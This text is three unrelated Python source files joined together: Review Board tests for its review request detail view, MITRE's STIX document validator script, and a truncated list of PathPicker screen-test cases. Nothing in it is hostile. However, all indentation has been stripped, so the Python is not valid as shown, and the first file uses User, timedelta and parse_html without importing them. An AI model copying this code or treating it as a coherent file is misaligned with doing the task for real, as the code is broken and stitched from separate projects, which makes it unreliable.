from djblets.extensions.hooks import TemplateHook
from djblets.extensions.models import RegisteredExtension
from djblets.siteconfig.models import SiteConfiguration
from kgb import SpyAgency
from reviewboard.extensions.base import Extension, get_extension_manager
from reviewboard.reviews.detail import InitialStatusUpdatesEntry, ReviewEntry
from reviewboard.reviews.fields import get_review_request_fieldsets
from reviewboard.reviews.models import Comment, GeneralComment, Review
from reviewboard.site.urlresolvers import local_site_reverse
from reviewboard.testing import TestCase
class ReviewRequestDetailViewTests(SpyAgency, TestCase):
"""Unit tests for reviewboard.reviews.views.ReviewRequestDetailView."""
fixtures = ['test_users', 'test_scmtools', 'test_site']
def test_get(self):
"""Testing ReviewRequestDetailView.get"""
review_request = self.create_review_request(publish=True)
response = self.client.get('/r/%d/' % review_request.id)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['review_request'].pk,
review_request.pk)
def test_context(self):
"""Testing ReviewRequestDetailView context variables"""
# Make sure this request is made while logged in, to catch the
# login-only pieces of the review_detail view.
self.client.login(username='admin', password='admin')
username = 'admin'
summary = 'This is a test summary'
description = 'This is my description'
testing_done = 'Some testing'
review_request = self.create_review_request(
publish=True,
submitter=username,
summary=summary,
description=description,
testing_done=testing_done)
response = self.client.get('/r/%s/' % review_request.pk)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['review_request'].pk, review_request.pk)
review_request = response.context['review_request']
self.assertEqual(review_request.submitter.username, username)
self.assertEqual(review_request.summary, summary)
self.assertEqual(review_request.description, description)
self.assertEqual(review_request.testing_done, testing_done)
def test_diff_comment_ordering(self):
"""Testing ReviewRequestDetailView and ordering of diff comments on a
review
"""
comment_text_1 = 'Comment text 1'
comment_text_2 = 'Comment text 2'
comment_text_3 = 'Comment text 3'
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
# Create the users who will be commenting.
user1 = User.objects.get(username='doc')
user2 = User.objects.get(username='dopey')
# Create the master review.
main_review = self.create_review(review_request, user=user1)
main_comment = self.create_diff_comment(main_review, filediff,
text=comment_text_1)
main_review.publish()
# First reply
reply1 = self.create_reply(
main_review,
user=user1,
timestamp=(main_review.timestamp + timedelta(days=1)))
self.create_diff_comment(reply1, filediff, text=comment_text_2,
reply_to=main_comment)
# Second reply
reply2 = self.create_reply(
main_review,
user=user2,
timestamp=(main_review.timestamp + timedelta(days=2)))
self.create_diff_comment(reply2, filediff, text=comment_text_3,
reply_to=main_comment)
# Publish them out of order.
reply2.publish()
reply1.publish()
# Make sure they published in the order expected.
self.assertTrue(reply1.timestamp > reply2.timestamp)
# Make sure they're looked up in the order expected.
comments = list(
Comment.objects
.filter(review__review_request=review_request)
.order_by('timestamp')
)
self.assertEqual(len(comments), 3)
self.assertEqual(comments[0].text, comment_text_1)
self.assertEqual(comments[1].text, comment_text_3)
self.assertEqual(comments[2].text, comment_text_2)
# Now figure out the order on the page.
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
entries = response.context['entries']
initial_entries = entries['initial']
self.assertEqual(len(initial_entries), 1)
self.assertIsInstance(initial_entries[0], InitialStatusUpdatesEntry)
main_entries = entries['main']
self.assertEqual(len(main_entries), 1)
entry = main_entries[0]
self.assertIsInstance(entry, ReviewEntry)
comments = entry.comments['diff_comments']
self.assertEqual(len(comments), 1)
self.assertEqual(comments[0].text, comment_text_1)
replies = comments[0].public_replies()
self.assertEqual(len(replies), 2)
self.assertEqual(replies[0].text, comment_text_3)
self.assertEqual(replies[1].text, comment_text_2)
def test_general_comment_ordering(self):
"""Testing ReviewRequestDetailView and ordering of general comments on
a review
"""
comment_text_1 = 'Comment text 1'
comment_text_2 = 'Comment text 2'
comment_text_3 = 'Comment text 3'
review_request = self.create_review_request(create_repository=True,
publish=True)
# Create the users who will be commenting.
user1 = User.objects.get(username='doc')
user2 = User.objects.get(username='dopey')
# Create the master review.
main_review = self.create_review(review_request, user=user1)
main_comment = self.create_general_comment(main_review,
text=comment_text_1)
main_review.publish()
# First reply
reply1 = self.create_reply(
main_review,
user=user1,
timestamp=(main_review.timestamp + timedelta(days=1)))
self.create_general_comment(reply1, text=comment_text_2,
reply_to=main_comment)
# Second reply
reply2 = self.create_reply(
main_review,
user=user2,
timestamp=(main_review.timestamp + timedelta(days=2)))
self.create_general_comment(reply2, text=comment_text_3,
reply_to=main_comment)
# Publish them out of order.
reply2.publish()
reply1.publish()
# Make sure they published in the order expected.
self.assertTrue(reply1.timestamp > reply2.timestamp)
# Make sure they're looked up in the order expected.
comments = list(
GeneralComment.objects
.filter(review__review_request=review_request)
.order_by('timestamp')
)
self.assertEqual(len(comments), 3)
self.assertEqual(comments[0].text, comment_text_1)
self.assertEqual(comments[1].text, comment_text_3)
self.assertEqual(comments[2].text, comment_text_2)
def test_file_attachments_visibility(self):
"""Testing ReviewRequestDetailView default visibility of file
attachments
"""
caption_1 = 'File Attachment 1'
caption_2 = 'File Attachment 2'
caption_3 = 'File Attachment 3'
comment_text_1 = 'Comment text 1'
comment_text_2 = 'Comment text 2'
user1 = User.objects.get(username='doc')
review_request = self.create_review_request()
# Add two file attachments. One active, one inactive.
file1 = self.create_file_attachment(review_request, caption=caption_1)
file2 = self.create_file_attachment(review_request, caption=caption_2,
active=False)
review_request.publish(user1)
# Create a third file attachment on a draft.
self.create_file_attachment(review_request, caption=caption_3,
draft=True)
# Create the review with comments for each screenshot.
review = Review.objects.create(review_request=review_request,
user=user1)
review.file_attachment_comments.create(file_attachment=file1,
text=comment_text_1)
review.file_attachment_comments.create(file_attachment=file2,
text=comment_text_2)
review.publish()
# Check that we can find all the objects we expect on the page.
self.client.login(username='doc', password='doc')
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
file_attachments = response.context['file_attachments']
self.assertEqual(len(file_attachments), 2)
self.assertEqual(file_attachments[0].caption, caption_1)
self.assertEqual(file_attachments[1].caption, caption_3)
# Make sure that other users won't see the draft one.
self.client.logout()
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
file_attachments = response.context['file_attachments']
self.assertEqual(len(file_attachments), 1)
self.assertEqual(file_attachments[0].caption, caption_1)
# Make sure we loaded the reviews and all data correctly.
entries = response.context['entries']
initial_entries = entries['initial']
self.assertEqual(len(initial_entries), 1)
self.assertIsInstance(initial_entries[0], InitialStatusUpdatesEntry)
main_entries = entries['main']
self.assertEqual(len(main_entries), 1)
entry = main_entries[0]
self.assertIsInstance(entry, ReviewEntry)
comments = entry.comments['file_attachment_comments']
self.assertEqual(len(comments), 2)
self.assertEqual(comments[0].text, comment_text_1)
self.assertEqual(comments[1].text, comment_text_2)
def test_screenshots_visibility(self):
"""Testing ReviewRequestDetailView default visibility of screenshots"""
caption_1 = 'Screenshot 1'
caption_2 = 'Screenshot 2'
caption_3 = 'Screenshot 3'
comment_text_1 = 'Comment text 1'
comment_text_2 = 'Comment text 2'
user1 = User.objects.get(username='doc')
review_request = self.create_review_request()
# Add two screenshots. One active, one inactive.
screenshot1 = self.create_screenshot(review_request, caption=caption_1)
screenshot2 = self.create_screenshot(review_request, caption=caption_2,
active=False)
review_request.publish(user1)
# Add a third screenshot on a draft.
self.create_screenshot(review_request, caption=caption_3, draft=True)
# Create the review with comments for each screenshot.
user1 = User.objects.get(username='doc')
review = Review.objects.create(review_request=review_request,
user=user1)
review.screenshot_comments.create(screenshot=screenshot1,
text=comment_text_1,
x=10,
y=10,
w=20,
h=20)
review.screenshot_comments.create(screenshot=screenshot2,
text=comment_text_2,
x=0,
y=0,
w=10,
h=10)
review.publish()
# Check that we can find all the objects we expect on the page.
self.client.login(username='doc', password='doc')
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
screenshots = response.context['screenshots']
self.assertEqual(len(screenshots), 2)
self.assertEqual(screenshots[0].caption, caption_1)
self.assertEqual(screenshots[1].caption, caption_3)
# Make sure that other users won't see the draft one.
self.client.logout()
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
screenshots = response.context['screenshots']
self.assertEqual(len(screenshots), 1)
self.assertEqual(screenshots[0].caption, caption_1)
entries = response.context['entries']
initial_entries = entries['initial']
self.assertEqual(len(initial_entries), 1)
self.assertIsInstance(initial_entries[0], InitialStatusUpdatesEntry)
main_entries = entries['main']
self.assertEqual(len(main_entries), 1)
entry = main_entries[0]
self.assertIsInstance(entry, ReviewEntry)
# Make sure we loaded the reviews and all data correctly.
comments = entry.comments['screenshot_comments']
self.assertEqual(len(comments), 2)
self.assertEqual(comments[0].text, comment_text_1)
self.assertEqual(comments[1].text, comment_text_2)
def test_with_anonymous_and_requires_site_wide_login(self):
"""Testing ReviewRequestDetailView with anonymous user and site-wide
login required
"""
with self.siteconfig_settings({'auth_require_sitewide_login': True},
reload_settings=False):
self.create_review_request(publish=True)
response = self.client.get('/r/1/')
self.assertEqual(response.status_code, 302)
def test_etag_with_issues(self):
"""Testing ReviewRequestDetailView ETags with issue status toggling"""
self.client.login(username='doc', password='doc')
# Some objects we need.
user = User.objects.get(username='doc')
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
# Create a review.
review = self.create_review(review_request, user=user)
comment = self.create_diff_comment(review, filediff,
issue_opened=True)
review.publish()
# Get the etag
response = self.client.get(review_request.get_absolute_url())
self.assertEqual(response.status_code, 200)
etag1 = response['ETag']
self.assertNotEqual(etag1, '')
# Change the issue status
comment.issue_status = Comment.RESOLVED
comment.save()
# Check the etag again
response = self.client.get(review_request.get_absolute_url())
self.assertEqual(response.status_code, 200)
etag2 = response['ETag']
self.assertNotEqual(etag2, '')
# Make sure they're not equal
self.assertNotEqual(etag1, etag2)
def test_review_request_box_template_hooks(self):
"""Testing ReviewRequestDetailView template hooks for the review
request box
"""
class ContentTemplateHook(TemplateHook):
def initialize(self, name, content):
super(ContentTemplateHook, self).initialize(name)
self.content = content
def render_to_string(self, request, context):
return self.content
class TestExtension(Extension):
registration = RegisteredExtension.objects.create(
class_name='test-extension',
name='test-extension',
enabled=True,
installed=True)
extension = TestExtension(get_extension_manager())
review_request = self.create_review_request(publish=True)
hooks = []
for name in ('before-review-request-summary',
'review-request-summary-pre',
'review-request-summary-post',
'after-review-request-summary-post',
'before-review-request-fields',
'after-review-request-fields',
'before-review-request-extra-panes',
'review-request-extra-panes-pre',
'review-request-extra-panes-post',
'after-review-request-extra-panes'):
hooks.append(ContentTemplateHook(extension, name,
'[%s here]' % name))
# Turn off some parts of the page, to simplify the resulting HTML
# and shorten render/parse times.
self.spy_on(get_review_request_fieldsets,
call_fake=lambda *args, **kwargs: [])
response = self.client.get(
local_site_reverse('review-request-detail',
args=[review_request.display_id]))
self.assertEqual(response.status_code, 200)
parsed_html = str(parse_html(response.content.decode('utf-8')))
self.assertIn(
'<div class="review-request-body">\n'
'[before-review-request-summary here]',
parsed_html)
self.assertIn(
'<div class="review-request-section review-request-summary">\n'
'[review-request-summary-pre here]',
parsed_html)
self.assertIn(
'</time>\n</p>[review-request-summary-post here]\n</div>',
parsed_html)
self.assertIn(
'[before-review-request-fields here]'
'<table class="review-request-section"'
' id="review-request-details">',
parsed_html)
self.assertIn(
'</div>'
'[after-review-request-fields here] '
'[before-review-request-extra-panes here]'
'<div id="review-request-extra">\n'
'[review-request-extra-panes-pre here]',
parsed_html)
self.assertIn(
'</div>[review-request-extra-panes-post here]\n'
'</div>[after-review-request-extra-panes here]\n'
'</div>',
parsed_html)
|
|
#!/usr/bin/env python
# Copyright (c) 2014, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
'''
STIX Document Validator (sdv) - validates STIX v1.1.1 instance documents.
'''
import sys
import os
import logging
import argparse
import json
import settings
from validators import (STIXSchemaValidator, STIXProfileValidator,
STIXBestPracticeValidator)
__version__ = "1.1.1.2"
QUIET_OUTPUT = False
EXIT_SUCCESS = 0
EXIT_FAILURE = 1
class ValidationOptions(object):
"""Collection of validation options which can be set via command line.
Attributes:
schema_validate: True if XML Schema validation should be performed.
use_schemaloc: True if the XML Schema validation process should look
at the xsi:schemaLocation attribute to find schemas to validate
against.
stix_version: The version of STIX which should be validated against.
profile_validate: True if profile validation should be performed.
best_practice_validate: True if STIX best practice validation should
be performed.
profile_convert: True if a STIX Profile should be converted into
schematron or xslt.
xslt_out: The filename for the output profile xslt.
schematron_out: The filename for the output profile schematron.
json_results: True if results should be printed in JSON format.
quiet_output: True if only results and fatal errors should be printed
to stdout/stderr.
in_files: A list of input files and directories of files to be
validated.
in_profile: A filename/path for a STIX Profile to validate against or
convert.
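Example (illustrative only; the file name is a placeholder):
>>> options = ValidationOptions()
>>> options.schema_validate = True
>>> options.in_files = ['stix-package.xml']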
"""
def __init__(self):
# validation options
self.schema_validate = False
self.use_schemaloc = False
self.stix_version = None
self.profile_validate = False
self.best_practice_validate = False
# conversion options
self.profile_convert = False
self.xslt_out = None
self.schematron_out = None
# output options
self.json_results = False
self.quiet_output = False
# input options
self.in_files = None
self.in_profile = None
# self.in_schemas = None # Not supported yet.
class ValidationResults(object):
"""Stores validation results for given file.
Args:
fn: The filename/path for the file that was validated.
Attributes:
fn: The filename/path for the file that was validated.
schema_results: XML schema validation results.
best_practice_results: STIX Best Practice validation results.
profile_results: STIX Profile validation results.
"""
def __init__(self, fn=None):
self.fn = fn
self.schema_results = None
self.best_practice_results = None
self.profile_results = None
class ArgumentError(Exception):
"""An exception to be raised when invalid or incompatible arguments are
passed into the application via the command line.
Args:
show_help (bool): If true, the help/usage information should be printed
to the screen.
Attributes:
show_help (bool): If true, the help/usage information should be printed
to the screen.
"""
def __init__(self, msg=None, show_help=False):
super(ArgumentError, self).__init__(msg)
self.show_help = show_help
class SchemaInvalidError(Exception):
"""Exception to be raised when schema validation fails for a given
STIX document.
Attributes:
results (dict): A dictionary of schema validation results.
"""
def __init__(self, msg=None, results=None):
super(SchemaInvalidError, self).__init__(msg)
self.results = results
def _error(msg):
"""Prints a message to the stderr prepended by '[!]'.
Args:
msg: The error message to print.
"""
sys.stderr.write("\n[!] %s\n" % str(msg))
sys.exit(EXIT_FAILURE)
def _info(msg):
"""Prints a message to stdout, prepended by '[-]'.
Note:
If the application is running in "Quiet Mode"
(i.e., ``QUIET_OUTPUT == True``), this function will return
immediately and no message will be printed.
Args:
msg: The message to print.
"""
if QUIET_OUTPUT:
return
print "[-] %s" % msg
def _print_level(fmt, level, *args):
"""Prints a formatted message to stdout prepended by spaces. Useful for
printing hierarchical information, like bullet lists.
Args:
fmt (str): A Python formatted string.
level (int): Used to determine how many spaces to print. The formula
is ``' ' * level``.
*args: Variable length list of arguments. Values are plugged into the
format string.
Examples:
>>> _print_level("%s", 0, "TEST")
TEST
>>> _print_level("%s", 1, "TEST")
TEST
>>> _print_level("%s", 2, "TEST")
TEST
"""
msg = fmt % args
spaces = ' ' * level
print "%s%s" % (spaces, msg)
def _get_dir_files(dir_):
"""Finds all the XML files under a directory.
Returns:
A list of file paths
"""
files = []
for fn in os.listdir(dir_):
if fn.endswith('.xml'):
fp = os.path.join(dir_, fn)
files.append(fp)
return files
def _get_files_to_validate(options):
"""Returns a list of files to validate.
Returns:
A list of filenames. An empty list if `options` does not have
``in_files`` set.
"""
files = options.in_files
if not files:
return []
to_validate = []
for fn in files:
if os.path.isdir(fn):
children = _get_dir_files(fn)
to_validate.extend(children)
else:
to_validate.append(fn)
return to_validate
def _set_output_level(options):
"""Set the output level for the application.
If the ``quiet_output`` or ``json_results`` attributes are set on `options`
then the application does not print informational messages to stdout; only
results or fatal errors are printed to stdout.
"""
global QUIET_OUTPUT
QUIET_OUTPUT = options.quiet_output or options.json_results
def _print_schema_results(fn, results):
"""Prints STIX Schema validation results to stdout.
Args:
fn: The name/path of the file that was validated.
results (dict): The validation results.
"""
if results['result']:
_print_level("[+] XML schema validation results: %s : VALID", 0, fn)
else:
_print_level("[!] XML schema validation results: %s : INVALID", 0, fn)
_print_level("[!] Validation errors", 0)
for error in results.get("errors", []):
_print_level("[!] %s", 1, error)
def _print_best_practice_results(fn, results):
"""Prints STIX Best Practice validation results to stdout.
Args:
fn: The name/path of the file that was validated.
results (dict): The validation results.
"""
if results['result']:
print "[+] Best Practice validation results: %s : VALID" % fn
else:
_print_level("[!] Best Practice validation results: %s : INVALID",
0, fn)
_print_level("[!] Best Practice warnings", 0)
if 'fatal' in results:
_print_level("[!] Fatal error occurred processing best practices: "
"%s", 1, results['fatal'])
return
warnings = results.get('warnings', {})
root_element = warnings.get('root_element')
if root_element:
_print_level("[#] Root element not STIX_Package: [%s]", 1,
root_element['tag'])
duplicate_ids = warnings.get('duplicate_ids')
if duplicate_ids:
_print_level("[#] Nodes with duplicate ids", 1)
for id_, list_nodes in duplicate_ids.iteritems():
_print_level("[~] id: [%s]", 2, id_)
for node in list_nodes:
_print_level("[%s] line: [%s]", 3, node['tag'],
node['line_number'])
missing_ids = warnings.get('missing_ids')
if missing_ids:
_print_level("[#] Nodes with missing ids", 1)
for node in missing_ids:
_print_level("[~] [%s] line: [%s]", 2, node['tag'],
node['line_number'])
unresolved_idrefs = warnings.get('unresolved_idrefs')
if unresolved_idrefs:
_print_level("[#] Nodes with idrefs that do not resolve", 1)
for node in unresolved_idrefs:
_print_level("[~] [%s] idref: [%s] line: [%s]", 2, node['tag'],
node['idref'], node['line_number'])
formatted_ids = warnings.get('id_format')
if formatted_ids:
_print_level("[#] Nodes with ids not formatted as [ns_prefix]:"
"[object-type]-[GUID]", 1)
for node in formatted_ids:
_print_level("[~] [%s] id: [%s] line: [%s]", 2, node['tag'],
node['id'], node['line_number'])
idrefs_with_content = warnings.get('idref_with_content')
if idrefs_with_content:
_print_level("[#] Nodes that declare idrefs but also contain "
"content", 1)
for node in idrefs_with_content:
_print_level("[~] [%s] idref: [%s] line: [%s]", 2, node['tag'],
node['idref'], node['line_number'])
indicator_suggestions = warnings.get('indicator_suggestions')
if indicator_suggestions:
_print_level("[#] Indicator suggestions", 1)
for node in indicator_suggestions:
_print_level("[~] id: [%s] line: [%s] missing: %s", 2,
node['id'], node['line_number'],
node.get('missing'))
missing_titles = warnings.get('missing_titles')
if missing_titles:
_print_level("[#] Missing Titles", 1)
for node in missing_titles:
_print_level("[~] [%s] id: [%s] line: [%s]", 2,
node['tag'], node['id'], node['line_number'])
marking_control_xpath_issues = warnings.get('marking_control_xpath_issues')
if marking_control_xpath_issues:
_print_level("[#] Controlled Structure XPath Issues", 1)
for node in marking_control_xpath_issues:
_print_level("[~] line: [%s]\tissue: %s", 2,
node['line_number'], node['problem'])
vocab_suggestions = warnings.get('vocab_suggestions')
if vocab_suggestions:
_print_level("[#] Vocab suggestions", 1)
for node in vocab_suggestions:
_print_level("[~] vocab: [%s] line: [%s] version used: [%s] version suggested: [%s]", 2,
node['out_of_date'], node['line_number'],
node['given_version'],
node.get('newest_version', "???"))
def _print_profile_results(fn, results):
"""Prints STIX Profile validation results to stdout.
Args:
fn: The name/path of the file that was validated.
results (dict): The validation results.
"""
report = results.get('report', {})
errors = report.get('errors')
if not errors:
_print_level("[+] Profile validation results: %s : VALID", 0, fn)
else:
_print_level("[!] Profile validation results: %s : INVALID", 0, fn)
_print_level("[!] Profile Errors", 0)
for error in sorted(errors, key=lambda x: x['error']):
msg = error.get('error')
line_numbers = error['line_numbers']
line_numbers.sort()
_print_level("[!] %s [%s]", 1, msg, ', '.join(line_numbers))
def _print_json_results(results):
"""Prints `results` to stdout in JSON format.
Args:
results: An instance of ``ValidationResults`` which contains the
results to print.
"""
json_results = {}
for fn, result in results.iteritems():
d = {}
if result.schema_results:
d['schema_validation'] = result.schema_results
if result.profile_results:
d['profile_results'] = result.profile_results
if result.best_practice_results:
d['best_practice_results'] = result.best_practice_results
json_results[fn] = d
print json.dumps(json_results)
def _print_results(results, options):
"""Prints `results` to stdout. If ``options.json_output`` is set, the
results are printed in JSON format.
Args:
results: An instance of ``ValidationResults`` which contains the
results to print.
options: An instance of ``ValidationOptions`` which contains output
options.
"""
if options.json_results:
_print_json_results(results)
return
for fn, result in results.iteritems():
if result.schema_results:
_print_schema_results(fn, result.schema_results)
if result.best_practice_results:
_print_best_practice_results(fn, result.best_practice_results)
if result.profile_results:
_print_profile_results(fn, result.profile_results)
def _convert_profile(validator, options):
"""Converts a STIX Profile to XSLT and/or Schematron formats.
This converts a STIX Profile document and writes the results to output
schematron and/or xslt files to the output file names.
The output file names are defined by
``options.xslt_out`` and ``options.schematron_out``.
Args:
validator: An instance of STIXProfileValidator
options: ValidationOptions instance with validation options for this
validation run.
"""
xslt = validator.get_xslt()
schematron = validator.get_schematron()
schematron_out_fn = options.schematron_out
xslt_out_fn = options.xslt_out
if schematron_out_fn:
_info("Writing schematron conversion of profile to %s" %
schematron_out_fn)
schematron.write(schematron_out_fn, pretty_print=True,
xml_declaration=True, encoding="UTF-8")
if xslt_out_fn:
_info("Writing xslt conversion of profile to %s" % xslt_out_fn)
xslt.write(xslt_out_fn, pretty_print=True, xml_declaration=True,
encoding="UTF-8")
def _schema_validate(validator, fn, options):
"""Performs STIX XML Schema validation against the input filename.
Args:
validator: An instance of validators.STIXSchemaValidator
fn: A filename for a STIX document
options: ValidationOptions instance with validation options for this
validation run.
Returns:
A dictionary of validation results
"""
_info("Performing xml schema validation on %s" % fn)
results = validator.validate(fn, version=options.stix_version,
schemaloc=options.use_schemaloc)
is_valid = results['result']
if not is_valid:
raise SchemaInvalidError(results=results)
return results
def _best_practice_validate(validator, fn, options):
"""Performs STIX Best Practice validation against the input filename.
Args:
validator: An instance of STIXBestPracticeValidator
fn: A filename for a STIX document
options: ValidationOptions instance with validation options for
this validation run.
Returns:
A dictionary of validation results
"""
_info("Performing best practice validation on %s" % fn)
results = validator.validate(fn, version=options.stix_version)
return results
def _profile_validate(validator, fn):
"""Performs STIX Profile validation against the input filename.
Args:
fn: A filename for a STIX document
Returns:
A dictionary of validation results
"""
_info("Performing profile validation on %s" % fn)
results = validator.validate(fn)
return results
def _get_schema_validator(options):
"""Initializes a ``STIXSchemaValidator`` instance.
Args:
options: An instance of ``ValidationOptions``
Returns:
An instance of ``STIXSchemaValidator``
"""
if options.schema_validate:
return STIXSchemaValidator(schemas=settings.SCHEMAS)
return None
def _get_profile_validator(options):
"""Initializes a ``STIXProfileValidator`` instance.
Args:
options: An instance of ``ValidationOptions``
Returns:
An instance of ``STIXProfileValidator``
"""
if any((options.profile_validate, options.profile_convert)):
return STIXProfileValidator(options.in_profile)
return None
def _get_best_practice_validator(options):
"""Initializes a ``STIXBestPracticeValidator`` instance.
Args:
options: An instance of ``ValidationOptions``
Returns:
An instance of ``STIXBestPracticeValidator``
"""
if options.best_practice_validate:
return STIXBestPracticeValidator()
return None
def _validate_file(fn, schema_validator, profile_validator,
best_practice_validator, options):
results = ValidationResults(fn)
try:
if schema_validator:
results.schema_results = _schema_validate(schema_validator, fn,
options)
if best_practice_validator:
results.best_practice_results = \
_best_practice_validate(best_practice_validator, fn, options)
if profile_validator:
results.profile_results = _profile_validate(profile_validator, fn)
except SchemaInvalidError as ex:
results.schema_results = ex.results
if any((profile_validator, best_practice_validator)):
msg = ("File %s was schema-invalid. No other validation will be "
"performed." % fn)
_info(msg)
return results
def _validate(options):
"""Validates files based on command line options.
Args:
options: An instance of ``ValidationOptions`` containing options for
this validation run.
"""
files = _get_files_to_validate(options)
schema_validator = _get_schema_validator(options)
profile_validator = _get_profile_validator(options)
best_practice_validator = _get_best_practice_validator(options)
results = {}
for fn in files:
result = _validate_file(fn, schema_validator, profile_validator,
best_practice_validator, options)
results[fn] = result
_print_results(results, options)
if options.profile_convert:
_convert_profile(profile_validator, options)
def _set_validation_options(args):
"""Populates an instance of ``ValidationOptions`` from the `args` param.
Args:
args (argparse.Namespace): The arguments parsed and returned from
ArgumentParser.parse_args().
Returns:
Instance of ``ValidationOptions``.
"""
options = ValidationOptions()
if (args.files and any((settings.SCHEMAS, args.use_schemaloc))):
options.schema_validate = True
if options.schema_validate and args.profile:
options.profile_validate = True
if args.profile and any((args.schematron, args.xslt)):
options.profile_convert = True
# best practice options
options.best_practice_validate = args.best_practices
# input options
options.stix_version = args.stix_version
options.in_files = args.files
options.in_profile = args.profile
# output options
options.xslt_out = args.xslt
options.schematron_out = args.schematron
options.json_results = args.json
options.quiet_output = args.quiet
return options
def _validate_args(args):
"""Checks that valid and compatible command line arguments were passed into
the application.
Args:
args (argparse.Namespace): The arguments parsed and returned from
ArgumentParser.parse_args().
Raises:
ArgumentError: If invalid or incompatible command line arguments were
passed into the application.
"""
schema_validate = False
profile_validate = False
profile_convert = False
if len(sys.argv) == 1:
raise ArgumentError("Invalid arguments", show_help=True)
if (args.files and any((settings.SCHEMAS, args.use_schemaloc))):
schema_validate = True
if schema_validate and args.profile:
profile_validate = True
if args.profile and any((args.schematron, args.xslt)):
profile_convert = True
if all((args.stix_version, args.use_schemaloc)):
raise ArgumentError("Cannot set both --stix-version and "
"--use-schemalocs")
if any((args.xslt, args.schematron)) and not args.profile:
raise ArgumentError("Profile filename is required when profile "
"conversion options are set.")
if (args.files and not any((settings.SCHEMAS, args.use_schemaloc))):
raise ArgumentError("Must provide either --use-schemaloc or "
"settings.SCHEMAS when --input-file or input-dir "
"declared")
if (args.profile and not any((profile_validate, profile_convert))):
raise ArgumentError("Profile specified but no conversion options or "
"validation options specified")
def _get_arg_parser():
"""Initializes and returns an argparse.ArgumentParser instance for this
application.
Returns:
Instance of ``argparse.ArgumentParser``
"""
parser = argparse.ArgumentParser(description="STIX Document Validator v%s"
% __version__)
parser.add_argument("--stix-version", dest="stix_version", default=None,
help="The version of STIX to validate against")
parser.add_argument("--use-schemaloc", dest="use_schemaloc",
action='store_true', default=False, help="Use "
"schemaLocation attribute to determine schema "
"locations.")
parser.add_argument("--best-practices", dest="best_practices",
action='store_true', default=False,
help="Check that the document follows authoring "
"best practices")
parser.add_argument("--profile", dest="profile", default=None,
help="Path to STIX profile in excel")
parser.add_argument("--schematron-out", dest="schematron", default=None,
help="Path to converted STIX profile schematron file "
"output.")
parser.add_argument("--xslt-out", dest="xslt", default=None,
help="Path to converted STIX profile schematron xslt "
"output.")
parser.add_argument("--quiet", dest="quiet", action="store_true",
default=False, help="Only print results and errors if "
"they occur.")
parser.add_argument("--json-results", dest="json", action="store_true",
default=False, help="Print results as raw JSON. This "
"also sets --quiet.")
parser.add_argument("files", metavar="FILES", nargs="*",
help="A whitespace separated list of STIX files or "
"directories of STIX files to validate.")
return parser
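# Example invocation (illustrative; file names are placeholders and schema
# validation assumes settings.SCHEMAS is configured):
#
#   python sdv.py --best-practices --profile profile.xlsx stix-package.xml
#
# This schema-validates stix-package.xml, checks STIX best practices and
# validates the document against the given profile.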
def main():
"""Entry point for sdv.py.
Parses and validates command line arguments and then does at least one of
the following:
* Validates instance document against schema/best practices/profile and
prints results to stdout.
* Converts a STIX profile into xslt and/or schematron formats
* Prints an error to stderr and exits with status 1
"""
parser = _get_arg_parser()
args = parser.parse_args()
try:
_validate_args(args)
options = _set_validation_options(args)
_set_output_level(options)
_validate(options)
except ArgumentError as ex:
if ex.show_help:
parser.print_help()
_error(ex)
except Exception:
logging.exception("Fatal error occurred")
sys.exit(EXIT_FAILURE)
if __name__ == '__main__':
main()
|
|
# Copyright (c) 2015-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
#
from __future__ import print_function
import sys
sys.path.insert(0, '../')
import unittest
import os
import screenTestRunner
EXPECTED_DIR = './expected/'
screenTestCases = [{
'name': 'simpleLoadAndQuit',
}, {
'name': 'tallLoadAndQuit',
'screenConfig': {
'maxX': 140,
'maxY': 60,
},
}, {
'name': 'selectFirst',
'inputs': ['f'],
}, {
'name': 'selectFirstWithDown',
'inputs': ['F'],
}, {
'name': 'selectDownSelect',
'inputs': ['f', 'j', 'f'],
}, {
'name': 'selectWithDownSelect',
'inputs': ['F', 'f'],
}, {
'name': 'selectDownSelectInverse',
'inputs': ['f', 'j', 'f', 'A'],
}, {
'name': 'selectWithDownSelectInverse',
'inputs': ['F', 'F', 'A'],
}, {
'name': 'selectTwoCommandMode',
'input': 'absoluteGitDiff.txt',
'inputs': ['f', 'j', 'f', 'c'],
'pastScreen': 3
}, {
'name': 'selectCommandWithPassedCommand',
'input': 'absoluteGitDiff.txt',
# the last key "a" is so we quit from command mode
# after seeing the warning
'withAttributes': True,
'inputs': ['f', 'c', 'a'],
'pastScreen': 1,
'args': ["-c 'git add'"]
}, {
'name': 'simpleWithAttributes',
'withAttributes': True
}, {
'name': 'simpleSelectWithAttributes',
'withAttributes': True,
'inputs': ['f', 'j'],
}, {
'name': 'simpleSelectWithColor',
'input': 'gitDiffColor.txt',
'withAttributes': True,
'inputs': ['f', 'j'],
'screenConfig': {
'maxX': 200,
'maxY': 40,
},
}, {
'name': 'gitDiffWithScroll',
'input': 'gitDiffNoStat.txt',
'inputs': ['f', 'j'],
}, {
'name': 'gitDiffWithScrollUp',
'input': 'gitLongDiff.txt',
'inputs': ['k', 'k'],
}, {
'name': 'gitDiffWithPageDown',
'input': 'gitLongDiff.txt',
'inputs': [' ', ' '],
}, {
'name': 'gitDiffWithPageDownColor',
'input': 'gitLongDiffColor.txt',
'inputs': [' ', ' '],
'withAttributes': True,
}, {
'name': 'gitDiffWithValidation',
'input': 'gitDiffSomeExist.txt',
'validateFileExists': True,
'withAttributes': True,
}, {
'name': 'longFileNames',
'input': 'longFileNames.txt',
'validateFileExists': False,
'withAttributes': False,
'screenConfig': {
'maxX': 20,
'maxY': 30,
}
}, {
'name': 'dontWipeChrome',
'input': 'gitDiffColor.txt',
'withAttributes': True,
